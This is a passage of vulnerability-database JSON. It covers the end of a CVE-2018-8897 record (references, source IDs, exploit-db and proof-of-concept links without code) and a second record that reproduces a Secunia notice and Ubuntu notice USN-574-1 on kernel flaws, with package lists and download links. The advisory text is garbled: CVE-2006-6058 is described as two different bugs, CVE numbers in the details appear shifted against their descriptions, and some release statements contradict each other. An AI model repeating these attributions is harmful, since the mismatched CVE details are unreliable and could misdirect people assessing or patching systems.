      {
        "db": "SECTRACK",
        "id": "1040849",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1040882",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1040744",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1040866",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1040861",
        "trust": 1.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "44697",
        "trust": 1.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45024",
        "trust": 1.1
      },
      {
        "db": "JVN",
        "id": "JVNVU98401336",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003031",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "147542",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "147550",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "147539",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "147548",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "147541",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148549",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147543",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147536",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-138929",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147540",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147535",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147552",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147545",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147651",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147533",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147646",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138929"
      },
      {
        "db": "BID",
        "id": "104071"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      },
      {
        "db": "PACKETSTORM",
        "id": "147550"
      },
      {
        "db": "PACKETSTORM",
        "id": "147540"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147552"
      },
      {
        "db": "PACKETSTORM",
        "id": "147545"
      },
      {
        "db": "PACKETSTORM",
        "id": "147548"
      },
      {
        "db": "PACKETSTORM",
        "id": "147651"
      },
      {
        "db": "PACKETSTORM",
        "id": "147533"
      },
      {
        "db": "PACKETSTORM",
        "id": "147646"
      },
      {
        "db": "PACKETSTORM",
        "id": "147539"
      },
      {
        "db": "PACKETSTORM",
        "id": "147542"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "id": "VAR-201805-0950",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138929"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T21:34:13.151000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Intel 64 and IA-32 Architectures Software Developer Manuals",
        "trust": 0.8,
        "url": "https://software.intel.com/en-us/articles/intel-sdm"
      },
      {
        "title": "NV18-013",
        "trust": 0.8,
        "url": "https://jpn.nec.com/security-info/secinfo/nv18-013.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-362",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138929"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "https://www.kb.cert.org/vuls/id/631579"
      },
      {
        "trust": 1.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8897"
      },
      {
        "trust": 1.4,
        "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2018-8897"
      },
      {
        "trust": 1.4,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1567074"
      },
      {
        "trust": 1.4,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-18:06.debugreg.asc"
      },
      {
        "trust": 1.4,
        "url": "https://usn.ubuntu.com/3641-1/"
      },
      {
        "trust": 1.4,
        "url": "https://usn.ubuntu.com/3641-2/"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:1319"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:1346"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:1347"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:1350"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:1352"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:1353"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:1355"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:1524"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/104071"
      },
      {
        "trust": 1.1,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190921-01-debug-en"
      },
      {
        "trust": 1.1,
        "url": "https://help.ecostruxureit.com/display/public/uadce725/security+fixes+in+struxureware+data+center+expert+v7.6.0"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20180927-0002/"
      },
      {
        "trust": 1.1,
        "url": "https://support.citrix.com/article/ctx234679"
      },
      {
        "trust": 1.1,
        "url": "https://www.synology.com/support/security/synology_sa_18_21"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4196"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4201"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/44697/"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/45024/"
      },
      {
        "trust": 1.1,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d8ba61ba58c88d5207c1ba2f7d9a2280e7d03be9"
      },
      {
        "trust": 1.1,
        "url": "http://openwall.com/lists/oss-security/2018/05/08/1"
      },
      {
        "trust": 1.1,
        "url": "http://openwall.com/lists/oss-security/2018/05/08/4"
      },
      {
        "trust": 1.1,
        "url": "https://github.com/can1357/cve-2018-8897/"
      },
      {
        "trust": 1.1,
        "url": "https://github.com/torvalds/linux/commit/d8ba61ba58c88d5207c1ba2f7d9a2280e7d03be9"
      },
      {
        "trust": 1.1,
        "url": "https://patchwork.kernel.org/patch/10386677/"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/ht208742"
      },
      {
        "trust": 1.1,
        "url": "https://www.triplefault.io/2018/05/spurious-db-exceptions-with-pop-ss.html"
      },
      {
        "trust": 1.1,
        "url": "https://xenbits.xen.org/xsa/advisory-260.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/05/msg00015.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/06/msg00000.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/11/msg00013.html"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:1318"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:1345"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:1348"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:1349"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:1351"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:1354"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040744"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040849"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040861"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040866"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040882"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-8897"
      },
      {
        "trust": 1.0,
        "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=333368"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8897"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu98401336/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/vulnerabilities/pop_ss"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1087"
      },
      {
        "trust": 0.3,
        "url": "http://www.microsoft.com"
      },
      {
        "trust": 0.3,
        "url": "https://support.apple.com/en-ie/ht208742"
      },
      {
        "trust": 0.3,
        "url": "https://lists.apple.com/archives/security-announce/2018/may/msg00001.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.synology.com/en-global/support/security/synology_sa_18_21"
      },
      {
        "trust": 0.3,
        "url": "https://kb.vmware.com/s/article/54988"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2018-1087"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000199"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-1000199"
      },
      {
        "trust": 0.1,
        "url": "https://svnweb.freebsd.org/base?view=revision\u0026amp;revision=333368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-18017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-7645"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-8824"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-7645"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/3431591"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18017"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-13166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-1000410"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-8824"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000410"
      },
      {
        "trust": 0.1,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/pop_ss"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16939"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-16939"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10471"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/xen"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10472"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10982"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10981"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4206"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4187"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1088"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1111"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.2/ht"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1088"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-1111"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-5754"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138929"
      },
      {
        "db": "BID",
        "id": "104071"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      },
      {
        "db": "PACKETSTORM",
        "id": "147550"
      },
      {
        "db": "PACKETSTORM",
        "id": "147540"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147552"
      },
      {
        "db": "PACKETSTORM",
        "id": "147545"
      },
      {
        "db": "PACKETSTORM",
        "id": "147548"
      },
      {
        "db": "PACKETSTORM",
        "id": "147651"
      },
      {
        "db": "PACKETSTORM",
        "id": "147533"
      },
      {
        "db": "PACKETSTORM",
        "id": "147646"
      },
      {
        "db": "PACKETSTORM",
        "id": "147539"
      },
      {
        "db": "PACKETSTORM",
        "id": "147542"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-138929"
      },
      {
        "db": "BID",
        "id": "104071"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      },
      {
        "db": "PACKETSTORM",
        "id": "147550"
      },
      {
        "db": "PACKETSTORM",
        "id": "147540"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147552"
      },
      {
        "db": "PACKETSTORM",
        "id": "147545"
      },
      {
        "db": "PACKETSTORM",
        "id": "147548"
      },
      {
        "db": "PACKETSTORM",
        "id": "147651"
      },
      {
        "db": "PACKETSTORM",
        "id": "147533"
      },
      {
        "db": "PACKETSTORM",
        "id": "147646"
      },
      {
        "db": "PACKETSTORM",
        "id": "147539"
      },
      {
        "db": "PACKETSTORM",
        "id": "147542"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-05-08T00:00:00",
        "db": "VULHUB",
        "id": "VHN-138929"
      },
      {
        "date": "2018-05-08T00:00:00",
        "db": "BID",
        "id": "104071"
      },
      {
        "date": "2018-05-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      },
      {
        "date": "2018-05-08T23:57:37",
        "db": "PACKETSTORM",
        "id": "147550"
      },
      {
        "date": "2018-05-08T23:52:29",
        "db": "PACKETSTORM",
        "id": "147540"
      },
      {
        "date": "2018-05-08T20:33:37",
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "date": "2018-05-09T17:44:38",
        "db": "PACKETSTORM",
        "id": "147552"
      },
      {
        "date": "2018-05-08T23:55:04",
        "db": "PACKETSTORM",
        "id": "147545"
      },
      {
        "date": "2018-05-08T23:56:36",
        "db": "PACKETSTORM",
        "id": "147548"
      },
      {
        "date": "2018-05-16T07:54:27",
        "db": "PACKETSTORM",
        "id": "147651"
      },
      {
        "date": "2018-05-08T20:32:15",
        "db": "PACKETSTORM",
        "id": "147533"
      },
      {
        "date": "2018-05-15T22:06:13",
        "db": "PACKETSTORM",
        "id": "147646"
      },
      {
        "date": "2018-05-08T23:52:05",
        "db": "PACKETSTORM",
        "id": "147539"
      },
      {
        "date": "2018-05-08T23:54:00",
        "db": "PACKETSTORM",
        "id": "147542"
      },
      {
        "date": "2018-05-08T18:29:00.547000",
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-138929"
      },
      {
        "date": "2018-05-17T06:00:00",
        "db": "BID",
        "id": "104071"
      },
      {
        "date": "2018-07-31T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "104071"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Intel Issue with not properly handling hardware architecture debug exceptions",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "104071"
      }
    ],
    "trust": 0.3
  }
}

var-200712-0602
Vulnerability from variot

The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the Linux kernel before 2.6.22 does not properly validate the hop-by-hop IPv6 extended header, which allows remote attackers to cause a denial of service (NULL pointer dereference and kernel panic) via a crafted IPv6 packet. Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users. This vulnerability is related to CVE-2007-4567. (CVE-2006-6058)

Certain calculations in the hugetlb code were not correct. (CVE-2007-4567)

Permissions were not correctly stored on JFFS2 ACLs. (CVE-2007-4997)

The Philips USB Webcam driver did not correctly handle disconnects. Only Ubuntu 7.10 contained the vulnerable code, and it is believed not to have been exploitable. (CVE-2007-5501)

When mounting the same remote NFS share to separate local locations, the first location's mount options would apply to all subsequent mounts of the same NFS share.


A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched.

Download and test it today: https://psi.secunia.com/

Read more about this new version: https://psi.secunia.com/?page=changelog


TITLE: Ubuntu update for kernel

SECUNIA ADVISORY ID: SA28170

VERIFY ADVISORY: http://secunia.com/advisories/28170/

CRITICAL: Moderately critical

IMPACT: DoS

WHERE:

From remote

OPERATING SYSTEM: Ubuntu Linux 7.10 http://secunia.com/product/16251/ Ubuntu Linux 7.04 http://secunia.com/product/14068/ Ubuntu Linux 6.10 http://secunia.com/product/12470/

DESCRIPTION: Ubuntu has issued an update for the kernel.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. =========================================================== Ubuntu Security Notice USN-574-1 February 04, 2008 linux-source-2.6.17/20/22 vulnerabilities CVE-2006-6058, CVE-2007-3107, CVE-2007-4567, CVE-2007-4849, CVE-2007-4997, CVE-2007-5093, CVE-2007-5500, CVE-2007-5501, CVE-2007-5966, CVE-2007-6063, CVE-2007-6151, CVE-2007-6206, CVE-2007-6417, CVE-2008-0001 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.10: linux-image-2.6.17-12-386 2.6.17.1-12.43 linux-image-2.6.17-12-generic 2.6.17.1-12.43 linux-image-2.6.17-12-hppa32 2.6.17.1-12.43 linux-image-2.6.17-12-hppa64 2.6.17.1-12.43 linux-image-2.6.17-12-itanium 2.6.17.1-12.43 linux-image-2.6.17-12-mckinley 2.6.17.1-12.43 linux-image-2.6.17-12-powerpc 2.6.17.1-12.43 linux-image-2.6.17-12-powerpc-smp 2.6.17.1-12.43 linux-image-2.6.17-12-powerpc64-smp 2.6.17.1-12.43 linux-image-2.6.17-12-server 2.6.17.1-12.43 linux-image-2.6.17-12-server-bigiron 2.6.17.1-12.43 linux-image-2.6.17-12-sparc64 2.6.17.1-12.43 linux-image-2.6.17-12-sparc64-smp 2.6.17.1-12.43

Ubuntu 7.04: linux-image-2.6.20-16-386 2.6.20-16.34 linux-image-2.6.20-16-generic 2.6.20-16.34 linux-image-2.6.20-16-hppa32 2.6.20-16.34 linux-image-2.6.20-16-hppa64 2.6.20-16.34 linux-image-2.6.20-16-itanium 2.6.20-16.34 linux-image-2.6.20-16-lowlatency 2.6.20-16.34 linux-image-2.6.20-16-mckinley 2.6.20-16.34 linux-image-2.6.20-16-powerpc 2.6.20-16.34 linux-image-2.6.20-16-powerpc-smp 2.6.20-16.34 linux-image-2.6.20-16-powerpc64-smp 2.6.20-16.34 linux-image-2.6.20-16-server 2.6.20-16.34 linux-image-2.6.20-16-server-bigiron 2.6.20-16.34 linux-image-2.6.20-16-sparc64 2.6.20-16.34 linux-image-2.6.20-16-sparc64-smp 2.6.20-16.34

Ubuntu 7.10: linux-image-2.6.22-14-386 2.6.22-14.51 linux-image-2.6.22-14-cell 2.6.22-14.51 linux-image-2.6.22-14-generic 2.6.22-14.51 linux-image-2.6.22-14-hppa32 2.6.22-14.51 linux-image-2.6.22-14-hppa64 2.6.22-14.51 linux-image-2.6.22-14-itanium 2.6.22-14.51 linux-image-2.6.22-14-lpia 2.6.22-14.51 linux-image-2.6.22-14-lpiacompat 2.6.22-14.51 linux-image-2.6.22-14-mckinley 2.6.22-14.51 linux-image-2.6.22-14-powerpc 2.6.22-14.51 linux-image-2.6.22-14-powerpc-smp 2.6.22-14.51 linux-image-2.6.22-14-powerpc64-smp 2.6.22-14.51 linux-image-2.6.22-14-rt 2.6.22-14.51 linux-image-2.6.22-14-server 2.6.22-14.51 linux-image-2.6.22-14-sparc64 2.6.22-14.51 linux-image-2.6.22-14-sparc64-smp 2.6.22-14.51 linux-image-2.6.22-14-ume 2.6.22-14.51 linux-image-2.6.22-14-virtual 2.6.22-14.51 linux-image-2.6.22-14-xen 2.6.22-14.51

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

Details follow:

The minix filesystem did not properly validate certain filesystem values. If a local attacker could trick the system into attempting to mount a corrupted minix filesystem, the kernel could be made to hang for long periods of time, resulting in a denial of service. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2006-6058)

The signal handling on PowerPC systems using HTX allowed local users to cause a denial of service via floating point corruption. This was only vulnerable in Ubuntu 6.10 and 7.04. This was only vulnerable in Ubuntu 7.04. (CVE-2007-4567)

The JFFS2 filesystem with ACL support enabled did not properly store permissions during inode creation and ACL setting. Local users could possibly access restricted files after a remount. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-4849)

Chris Evans discovered an issue with certain drivers that use the ieee80211_rx function. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-4997)

Alex Smith discovered an issue with the pwc driver for certain webcam devices. A local user with physical access to the system could remove the device while a userspace application had it open and cause the USB subsystem to block. This was only vulnerable in Ubuntu 7.04. (CVE-2007-5093)

Scott James Remnant discovered a coding error in ptrace. This was only vulnerable in Ubuntu 7.04 and 7.10. This was only vulnerable in Ubuntu 7.10. (CVE-2007-5501)

Warren Togami discovered that the hrtimer subsystem did not properly check for large relative timeouts. (CVE-2007-5966)

Venustech AD-LAB discovered a buffer overflow in the isdn net subsystem. This issue is exploitable by local users via crafted input to the isdn_ioctl function. (CVE-2007-6063)

It was discovered that the isdn subsystem did not properly check for NULL termination when performing ioctl handling. (CVE-2007-6151)

Blake Frantz discovered that when a root process overwrote an existing core file, the resulting core file retained the previous core file's ownership. (CVE-2007-6206)

Hugh Dickins discovered the when using the tmpfs filesystem, under rare circumstances, a kernel page may be improperly cleared. (CVE-2007-6417)

Bill Roman discovered that the VFS subsystem did not properly check access modes. (CVE-2008-0001)

Updated packages for Ubuntu 6.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43.diff.gz
  Size/MD5:  2088629 e6f2abefc3d6b741165ad85e3e12e1cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43.dsc
  Size/MD5:     2324 dba618e1ef3933ef7b72f9ae0c2f2a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz
  Size/MD5: 59339565 2e5451201e38e865cbc7b0717fa124a1

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.43_all.deb
  Size/MD5:  4507566 f3593f4794ecb3c76651d3ee5fa80765
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.43_all.deb
  Size/MD5:  1098296 620681fa48911c868638eb45a081ef19
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43_all.deb
  Size/MD5: 46084550 a000ec6ae14a1430b19961088773e415

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    28612 a364ed5ec4a61c86836d92df3e7d1671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    50500 93635a5be96568a0bcc013b0f9374828
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:     2446 7c308d57a11c0852c5c191b32db03543
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    40788 203ccc34e8d6ef08fefdb297f43660b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   113552 a08770e0ab9c5a095b3bbeb9aaa494b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    43992 045de726c19efd85aec0c58e19a4e206
